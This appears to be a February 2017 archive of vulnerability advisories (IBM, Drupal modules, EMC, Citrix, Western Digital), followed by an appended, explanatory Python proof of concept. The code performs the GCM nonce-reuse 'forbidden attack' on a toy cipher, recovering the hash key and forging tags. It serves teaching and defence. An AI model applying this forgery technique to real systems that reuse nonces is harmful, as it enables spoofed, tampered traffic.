IBM Rational DOORS Next Generation 5.0 and 6.0 discloses sensitive information in error response messages that could be used for further attacks against the system.
Monthly Archives: February 2017
CVE-2017-1127
IBM Rational DOORS Next Generation 4.0, 5.0 and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session.
CVE-2016-6032
IBM Rational Team Concert 4.0, 5.0 and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session.
OSF for Drupal – Less Critical – Cross Site Scripting (XSS) – SA-CONTRIB-2017-014
- Advisory ID: DRUPAL-SA-CONTRIB-2017-014
- Project: OSF for Drupal (third-party module)
- Version: 7.x
- Date: 2017-February-08
- Security risk: 5/25 (Less Critical) AC:Basic/A:Admin/CI:None/II:None/E:Theoretical/TD:Uncommon
- Vulnerability: Cross Site Scripting
Description
This module enables administrators to use a user interface to create complex semantic queries that can be saved to be used in different locations of a Drupal instance that uses OSF.
CVE identifier(s) issued
- A CVE identifier will be requested, and added upon issuance, in accordance with Drupal Security Team processes.
Versions affected
- osf_querybuilder 7.x-3.x versions prior to 7.x-3.4.
Drupal core is not affected. If you do not use the contributed OSF for Drupal module, there is nothing you need to do.
Solution
Install the latest version:
- If you use the OSF for Drupal module for Drupal 7.x, upgrade to OSF for Drupal 7.x-3.4
Also see the OSF for Drupal project page.
Reported by
Fixed by
- Frederick Giasson the module maintainer
Coordinated by
- Michael Hess of the Drupal Security Team
Contact and More Information
The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.
Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.
Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity
Acquia Content Hub – Moderately Critical – Access Bypass – SA-CONTRIB-2017-013
- Advisory ID: DRUPAL-SA-CONTRIB-2017-013
- Project: Acquia Content Hub (third-party module)
- Version: 8.x
- Date: 2017-February-08
- Security risk: 13/25 (Moderately Critical) AC:Basic/A:None/CI:Some/II:None/E:Theoretical/TD:All
- Vulnerability: Access bypass
Description
The Acquia Content Hub module enables the distribution and discovery of content from any source using the Acquia Content Hub service.
The module allows rendering of any arbitrary entity, without performing the appropriate access check. Users browsing to a well crafted URL could access information they may not be authorized to view.
CVE identifier(s) issued
- A CVE identifier will be requested, and added upon issuance, in accordance with Drupal Security Team processes.
Versions affected
- Acquia Content Hub 8.x-1.x versions prior to 8.x-1.4.
Drupal core is not affected. If you do not use the contributed Acquia Content Hub module, there is nothing you need to do.
Solution
Install the latest version:
- If you use the Acquia Content Hub module for Drupal 8.x, upgrade to Acquia Content Hub 8.x-1.4
Also see the Acquia Content Hub project page.
Reported by
Fixed by
- Alejandro Barrios the module maintainer
- Cash William of the Drupal Security Team
- Samuel Mortenson
- Kyle Browning
- Wim Leers
Coordinated by
- Stéphane Corlosquet of the Drupal Security Team
Contact and More Information
The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.
Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.
Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity
Authentication bypass vulnerability in Western Digital My Cloud
Posted by Securify B.V. on Feb 08
————————————————————————
Authentication bypass vulnerability in Western Digital My Cloud
————————————————————————
Remco Vermeulen, January 2017
————————————————————————
Abstract
————————————————————————
It was discovered that Western Digital My Cloud is…
CVE-2017-2765
EMC Isilon InsightIQ 4.1.0, 4.0.1, 4.0.0, 3.2.2, 3.2.1, 3.2.0, 3.1.1, 3.1.0, 3.0.1, 3.0.0 is affected by an authentication bypass vulnerability that could potentially be exploited by attackers to compromise the affected system.
New "Fileless Malware" Targets Banks and Organizations Spotted in the Wild
More than a hundred banks and financial institutions across the world have been infected with a dangerous, sophisticated memory-based malware that is almost undetectable, researchers warned.
Newly published report by the Russian security firm Kaspersky Lab indicates that hackers are targeting banks, telecommunication companies, and government organizations in 40 countries, including the US,
Wetkit Omega – Moderately Critical – Access Bypass – SA-CONTRIB-2017-012
- Advisory ID: DRUPAL-SA-CONTRIB-2017-012
- Project: Web Experience Toolkit: Omega (third-party module)
- Version: 7.x
- Date: 2017-February-08
- Security risk: 10/25 (Moderately Critical) AC:Basic/A:User/CI:Some/II:None/E:Proof/TD:Uncommon
- Vulnerability: Access bypass
Description
WetKit Omega 4.x is a modern, Sass and Compass enabled Drupal 7 theme powered by the Omega base theme.
When using the Drupal page cache, some links intended for privileged users can get cached and displayed to users who shouldn’t have access to them.
This is mitigated by the fact that the unprivileged users won’t be able to actually visit the links.
CVE identifier(s) issued
- A CVE identifier will be requested, and added upon issuance, in accordance with Drupal Security Team processes.
Versions affected
- wetkit_omega 7.x-1.x versions prior to 7.x-1.15.
Drupal core is not affected. If you do not use the contributed Web Experience Toolkit: Omega module, there is nothing you need to do.
Solution
Install the latest version:
- If you use the wetkit_omega module for Drupal 7.x, upgrade to wetkit_omega 7.x-1.15
Also see the Web Experience Toolkit: Omega project page.
Reported by
Fixed by
- William Hearn the module maintainer
Coordinated by
- Michael Hess of the Drupal Security Team
- David Snopek of the Drupal Security Team
Contact and More Information
The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.
Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.
Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity
CVE-2017-5933
Citrix NetScaler ADC and NetScaler Gateway 10.5 before Build 65.11, 11.0 before Build 69.12/69.123, and 11.1 before Build 51.21 does not properly generate GCM nonces, which makes it easier for remote attackers to obtain the authentication key and spoof data by leveraging a reused nonce in a session and a “forbidden attack,” a similar issue to CVE-2016-0270.
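The "forbidden attack" referenced in CVE-2017-5933 works because a GCM tag is GHASH_H(ciphertext) XOR E_K(J0), and both H and E_K(J0) are fixed for a given key and nonce. Two records sealed under the same nonce therefore have tags whose XOR is a polynomial in H with no unknown masking term, and once H is recovered the attacker can re-tag any ciphertext for that nonce. The following is an added example, not Citrix code and not code from the original page: it implements GHASH over GF(2^128) with GCM's bit ordering, recovers H from two single-block messages sealed under a reused nonce, and forges a valid tag. SHA-256 stands in for the AES block cipher (an assumption made so the example runs on the standard library; the attack depends only on GHASH, not on the block cipher), the key, nonce and plaintexts are constructed, and the victim messages are restricted to one block with no AAD so that the equation for H is a simple square root.

```python
# Added example (not Citrix's or the page's code): the GCM "forbidden attack"
# on a toy GCM in which SHA-256 replaces the AES block cipher (assumption).
import hashlib

R = 0xE1 << 120        # GCM reduction constant for x^128 + x^7 + x^2 + x + 1
ONE = 1 << 127         # multiplicative identity in GCM's reflected bit ordering
BLOCK = 16


def gf_mul(x: int, y: int) -> int:
    """Multiply two 128-bit elements of GF(2^128) as in SP 800-38D Algorithm 1."""
    z, v = 0, y
    for i in range(128):
        if (x >> (127 - i)) & 1:      # bit 0 of the block is the most significant
            z ^= v
        v = (v >> 1) ^ R if v & 1 else v >> 1
    return z


def gf_pow(x: int, e: int) -> int:
    """Square-and-multiply exponentiation in GF(2^128)."""
    result, base = ONE, x
    while e:
        if e & 1:
            result = gf_mul(result, base)
        base = gf_mul(base, base)
        e >>= 1
    return result


def gf_inv(x: int) -> int:
    return gf_pow(x, (1 << 128) - 2)      # x^(2^128 - 2) == x^-1


def gf_sqrt(x: int) -> int:
    return gf_pow(x, 1 << 127)            # squaring is a bijection: (x^(2^127))^2 == x


def ghash(h: int, ct: bytes) -> int:
    """GHASH of one ciphertext block with no AAD: C*H^2 xor L*H (L = length block)."""
    length_block = len(ct) * 8            # 64-bit AAD length (0) || 64-bit ciphertext bit length
    y = gf_mul(int.from_bytes(ct, "big"), h)
    return gf_mul(y ^ length_block, h)


class ToyGcm:
    """GCM structure with SHA-256 as a stand-in block cipher (assumption, not real AES-GCM)."""

    def __init__(self, key: bytes):
        self.key = key
        self.h = int.from_bytes(self._e(b"H-subkey"), "big")   # H = E_K(0) in real GCM

    def _e(self, block: bytes) -> bytes:
        return hashlib.sha256(self.key + block).digest()[:BLOCK]

    def seal(self, nonce: bytes, pt: bytes):
        assert len(pt) == BLOCK, "example handles exactly one block"
        keystream = self._e(nonce + b"\x00\x00\x00\x02")          # CTR block 2
        ct = bytes(p ^ k for p, k in zip(pt, keystream))
        s = int.from_bytes(self._e(nonce + b"\x00\x00\x00\x01"), "big")   # E_K(J0)
        return ct, (ghash(self.h, ct) ^ s).to_bytes(BLOCK, "big")

    def open(self, nonce: bytes, ct: bytes, tag: bytes) -> bool:
        s = int.from_bytes(self._e(nonce + b"\x00\x00\x00\x01"), "big")
        return (ghash(self.h, ct) ^ s).to_bytes(BLOCK, "big") == tag


def recover_h(c1: bytes, t1: bytes, c2: bytes, t2: bytes) -> int:
    """Same nonce and same length: T1^T2 = (C1^C2)*H^2, so H = sqrt((T1^T2)/(C1^C2))."""
    dc = int.from_bytes(c1, "big") ^ int.from_bytes(c2, "big")
    dt = int.from_bytes(t1, "big") ^ int.from_bytes(t2, "big")
    if dc == 0:
        raise ValueError("need two distinct ciphertexts under the reused nonce")
    return gf_sqrt(gf_mul(dt, gf_inv(dc)))


def forge_tag(h: int, known_ct: bytes, known_tag: bytes, new_ct: bytes) -> bytes:
    """E_K(J0) = T1 ^ GHASH_H(C1); reuse it to authenticate any ciphertext under that nonce."""
    s = ghash(h, known_ct) ^ int.from_bytes(known_tag, "big")
    return (ghash(h, new_ct) ^ s).to_bytes(BLOCK, "big")


def demo():
    """Returns (H recovered correctly, forged tag accepted by the victim)."""
    device = ToyGcm(b"constructed-demo-key")       # key is secret to the attacker
    nonce = b"\x00" * 12                           # reused nonce: the CVE-2017-5933 condition
    c1, t1 = device.seal(nonce, b"GET /index.html ")
    c2, t2 = device.seal(nonce, b"GET /admin/     ")
    h = recover_h(c1, t1, c2, t2)                  # attacker sees only c1, t1, c2, t2
    evil_ct = bytes(b ^ 0x55 for b in c1)          # flip plaintext bits through CTR mode
    forged = forge_tag(h, c1, t1, evil_ct)
    return h == device.h, device.open(nonce, evil_ct, forged)


if __name__ == "__main__":
    print(demo())
```

With more than one ciphertext block the XOR of the two tags is a polynomial in H of degree one higher than the block count, so the general attack finds its roots in GF(2^128) rather than taking a square root; the field arithmetic above is the part that carries over unchanged. The practical check for a NetScaler deployment is the fix level in the advisory text: GCM nonces must never repeat under one key, and a build that reuses them has no margin for "how much" data was sent.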
